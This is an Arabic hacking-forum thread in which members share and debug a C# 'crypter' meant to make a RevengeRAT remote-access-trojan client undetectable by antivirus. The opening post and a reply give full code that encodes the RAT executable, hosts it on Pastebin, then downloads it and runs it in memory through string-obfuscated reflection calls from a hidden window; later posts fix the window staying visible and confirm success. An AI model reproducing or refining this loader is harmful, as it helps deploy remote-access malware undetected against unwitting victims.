تشفير سيرفر RevengeRAT كلين [0/38]

تم تحميل الصفحة في 0,8241849 ثانية
تشفير سيرفر RevengeRAT كلين [0/38]
الحالة
مغلق و غير مفتوح للمزيد من الردود.

x-ViRuS_Sy

ExpErt DeveloPer
rankrankrankrank
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.


السلام عليكم ورحمة الله وبركاته،
تشفيرة بسيطة جداً للمبتدئين ..
بدون مُقدمات وبسرعة ندخل بالمهم ,
أولاً اعمل مشروع سي شارب
استخرج قيم سيرفرك عن طريق :
C#:
Clipboard.SetText(HttpServerUtility.UrlTokenEncode(System.IO.File.ReadAllBytes(@"C:\Users\x-ViRuS_Sy\Desktop\Client.exe")));
طبعا لا ننسى اضافة الريفيرنس System.Net
بتنفيذ الكود سيتم نسخ القيم بالكليبورد..
بعدها خذهم وارفعهم على موقع Pastebin وخذ الرابط RAW

بعدها اعمل مشروع ثاني جديد للسيرفر..
يتضمن التالي :
لا تنسى استبدال رابط سيرفر بدلاً من YourLink.

C#:
public WebClient tt = new WebClient();
        private void Form1_Load(object sender, EventArgs e)
        {

            //----------------------------
            Hide();
            ShowIcon = false;
            ShowInTaskbar = false;

            byte[] bb = HttpServerUtility.UrlTokenDecode(tt.DownloadString("YourLink"));


            //----------------------------
            object bb0 = Interaction.CallByName(AppDomain.CurrentDomain, "ABCE".Replace("A", "L").Replace("B", "o").Replace("C", "a").Replace("E", "d"), CallType.Method, bb);
            object bb1 = Interaction.CallByName(bb0, tt.DownloadString("http://pastebin.com/raw/00w8nzEQ").Replace("@", "p").Replace("!", "t").Substring(10, 10), CallType.Get);
            object bb2 = Interaction.CallByName(bb1, Decrypttt("䥮癯步"), CallType.Method, 10000000 - 10000000, null);
        }
        public string Decrypttt(string input)
        {
            return Encoding.ASCII.GetString(Encoding.BigEndianUnicode.GetBytes(input));
        }

كل ما سبق بفيديو بسيط تابع :


النتيجة :





لك أنت فقط :38:


 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.
جميل جدا أخي نتيجة قوية :dv (2):
(سؤال :) ما هدا =>
HttpServerUtility.UrlTokenEncode
)
نورت أخي الغالي :38: , أكواد بسيطة بنتيجة مقبولة بعض الشيء ..
هنا كل شيء حول الـ HttpServerUtility.UrlTokenEncode
هنا : HttpServerUtility.UrlTokenEncode Method (Byte[]) (System.Web)
والفرق مع الـ Convert.ToBase64String
What is the difference between Convert.ToBase64String(byte[]) and HttpServerUtility.UrlTokenEncode(byte[])?
 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,549
النقاط
173
الإقامة
Germany
الحبيب الاريب جود ماشاء الله عليك اخي الحبيب
موضوع موفق اتمنى رؤية المزيد من ابداعاتك اخي الحبيب
مافيه حل لتطور اي شخص الا انه يرفق افكاره واللي بيسويه
الله يعطيك العافية اخي الحبيب
 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.
الحبيب الاريب جود ماشاء الله عليك اخي الحبيب
موضوع موفق اتمنى رؤية المزيد من ابداعاتك اخي الحبيب
مافيه حل لتطور اي شخص الا انه يرفق افكاره واللي بيسويه
الله يعطيك العافية اخي الحبيب
أكيد ان شاء الله ..
ويعطيك العافية أيضاً للدعم :38: ..
نورت .. :38:
 
إنضم
17 يناير 2015
المشاركات
125
الإعجابات
112
النقاط
43
الإقامة
jordan
هل الكود صحيح ؟
عند تشغيل السيرفر يظهر الفريم !!



C#:
using Microsoft.VisualBasic;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Net;
using System.Text;
using System.Web;
using System.Windows.Forms;

namespace WindowsFormsApp3
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
        public WebClient tt = new WebClient();
        private void Form1_Load(object sender, EventArgs e)
        {   


            Hide();
            ShowIcon = false;
            ShowInTaskbar = false;

            byte[] bb = HttpServerUtility.UrlTokenDecode(tt.DownloadString("www"));



            object bb0 = Interaction.CallByName(AppDomain.CurrentDomain, "ABCE".Replace("A", "L").Replace("B", "o").Replace("C", "a").Replace("E", "d"), CallType.Method, bb);
            object bb1 = Interaction.CallByName(bb0, tt.DownloadString("http://pastebin.com/raw/00w8nzEQ").Replace("@", "p").Replace("!", "t").Substring(10, 10), CallType.Get);
            object bb2 = Interaction.CallByName(bb1, Decrypttt("䥮癯步"), CallType.Method, 10000000 - 10000000, null);
        }
        public string Decrypttt(string input)
        {
            return Encoding.ASCII.GetString(Encoding.BigEndianUnicode.GetBytes(input));
        }
    }

}
 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.
هل الكود صحيح ؟
عند تشغيل السيرفر يظهر الفريم !!



C#:
using Microsoft.VisualBasic;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Net;
using System.Text;
using System.Web;
using System.Windows.Forms;

namespace WindowsFormsApp3
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }
        public WebClient tt = new WebClient();
        private void Form1_Load(object sender, EventArgs e)
        {  


            Hide();
            ShowIcon = false;
            ShowInTaskbar = false;

            byte[] bb = HttpServerUtility.UrlTokenDecode(tt.DownloadString("www"));



            object bb0 = Interaction.CallByName(AppDomain.CurrentDomain, "ABCE".Replace("A", "L").Replace("B", "o").Replace("C", "a").Replace("E", "d"), CallType.Method, bb);
            object bb1 = Interaction.CallByName(bb0, tt.DownloadString("http://pastebin.com/raw/00w8nzEQ").Replace("@", "p").Replace("!", "t").Substring(10, 10), CallType.Get);
            object bb2 = Interaction.CallByName(bb1, Decrypttt("䥮癯步"), CallType.Method, 10000000 - 10000000, null);
        }
        public string Decrypttt(string input)
        {
            return Encoding.ASCII.GetString(Encoding.BigEndianUnicode.GetBytes(input));
        }
    }

}
صورة للخطأ .. لو سمحت ..
 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.

Bashar Bachir

ديـف بـويـنـتـي
إنضم
16 مارس 2011
المشاركات
7,538
الإعجابات
8,549
النقاط
173
الإقامة
Germany
لا اعرف صراحةً , اين المشكلة
أستاذ @Bashar Bachir أفدنا لو سمحت وين ممكن يكون الخطأ؟
لازم مايظهر الفورم بس خله يجرب يضع الــ Opacity من خصائص الفورم يسويها 0%
على كل الفورم كله مش لازم يشيل الاكواد ويحطهم بالكلاس Program
ويحذف الفورم ..
 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.
إنضم
17 يناير 2015
المشاركات
125
الإعجابات
112
النقاط
43
الإقامة
jordan
x-ViRuS_Sy
Bashar Bachir
شكرا زبطت الطريقة معي الف شكر الكم كل الحب والاحترام ♥

-----
بس يا ريت تنزلو طريقة :.. كمثال انو كل واحد يقدر يعدل على التشفيرة على اساس يكون كل شخص واله تشفيرتو الخاصة

وشكرا ☺ ....
 
إنضم
29 أبريل 2015
المشاركات
1,975
الإعجابات
2,291
النقاط
153
الإقامة
.::© 127.0.0.1 ©::.
جميل جدا ماشاء الله عليك اخي
الله يبارك فيك ويحفظك
وفيك بركة أخي ، ويحفظك ربي ..
نورت :38:
x-ViRuS_Sy
Bashar Bachir
شكرا زبطت الطريقة معي الف شكر الكم كل الحب والاحترام ♥

-----
بس يا ريت تنزلو طريقة :.. كمثال انو كل واحد يقدر يعدل على التشفيرة على اساس يكون كل شخص واله تشفيرتو الخاصة

وشكرا ☺ ....
طالما نبهنا لهاذا الموضوع، لازم تتعلم البرمجة اخي , أقل تقدير تعلم البرمجة من اجل التشفير فقط اذا كنت تريد ..
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل